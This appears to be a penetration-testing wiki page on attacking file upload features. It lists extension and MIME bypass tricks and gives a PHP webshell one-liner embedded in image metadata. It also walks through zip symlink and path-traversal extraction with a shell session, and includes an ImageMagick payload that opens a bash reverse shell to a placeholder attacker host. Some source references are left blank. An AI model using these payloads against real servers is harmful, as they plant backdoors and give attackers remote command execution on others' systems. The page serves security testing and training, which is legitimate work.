Physical attacks
Mobile Apps Pentesting

File Upload

File Upload General Methodology

  1. Try to upload a file with a double extension (ex: file.png.php or file.png.php5).

    • PHP extensions: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtml, .pgif, .shtml, .htaccess, .phar, .inc

    • ASP extensions: .asp, .aspx, .config

  2. Try to uppercase some letter(s) of the extension. Like: .pHp, .pHP5, .PhAr ...

  3. Try to add some especial characters at the end of the extension: %00, %20, (several dots)....

  4. Set the value of the header to: image/png or text/plain

  5. Put at the beginning the bytes of a real image (confuse the file command). Or introduce the shell inside the metadata: exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg

  6. Upload the backdoor with an allowed extension (png) and pray for a misconfiguration that executed the backdoor

  7. Null Byte: file.php%00.png

  8. Find a vulnerability to rename the file

  9. Find a Local File Inclusion vulnerability to execute the backdoor

If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code. If you are trying to upload files to an ASP server, take a look at the .config trick to execute code.

The .phar files are like the .jar for java, but for php, and can be used like a php file (executing it with php, or including it inside a script...)

The .inc extension is sometimes used for php files that are only used to import files, so, at some point, someone could have allow this extension to be executed.

Check a lot of possible file upload vulnerabilities with BurpSuit plugin

From File upload to other vulns

Zip File Automatically decompressed Upload

If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:

Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:

ln -s ../../../index.php symindex.txt
zip --symlinks symindex.txt

Decompress in different folders

The decompressed files will be created in unexpected folders.

The following content was copied from:

One could easily assume that this setup protects from OS-level command execution via malicious file uploads but unfortunately this is not true. Since ZIP archive format supports hierarchical compression and we can also reference higher level directories we can escape from the safe upload directory by abusing the decompression feature of the target application.

An automated exploit to create this kind of files can be found here:

python -o unix -d 5 -p /var/www/html/ rev.php

To achieve remote command execution I took the following steps:

1. Create a PHP shell:

$cmd = ($_REQUEST['cmd']);

2. Use “file spraying” and create a compressed zip file:

root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# ls *.php
simple-backdoor.php xxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
xxAcmd.php xxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
xxAxxAcmd.php xxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAcmd.php
root@s2crew:/tmp# zip xx*.php
adding: xxAcmd.php (deflated 40%)
adding: xxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)

3.Use a hexeditor or vi and change the “xxA” to “../”, I used vi:

:set modifiable


Only one step remained: Upload the ZIP file and let the application decompress it! If it is succeeds and the web server has sufficient privileges to write the directories there will be a simple OS command execution shell on the system:



Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)

push graphic-context
viewbox 0 0 640 480
fill ‘url(”|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch “hello)’
pop graphic-context

Polyglot Files

Polyglots, in a security context, are files that are a valid form of multiple different file types. For example, a GIFAR is both a GIF and a RAR file. There are also files out there that can be both GIF and JS, both PPT and JS, etc.

Polyglot files are often used to bypass protection based on file types. Many applications that allow users to upload files only allow uploads of certain types, such as JPEG, GIF, DOC, so as to prevent users from uploading potentially dangerous files like JS files, PHP files or Phar files.

This helps to upload a file that complins with the format of several different formats. It can allows you to upload a PHAR file (PHp ARchive) that also looks like a JPEG, but probably you will still needs a valid extension and if the upload function doesn't allow it this won't help you.

More information in: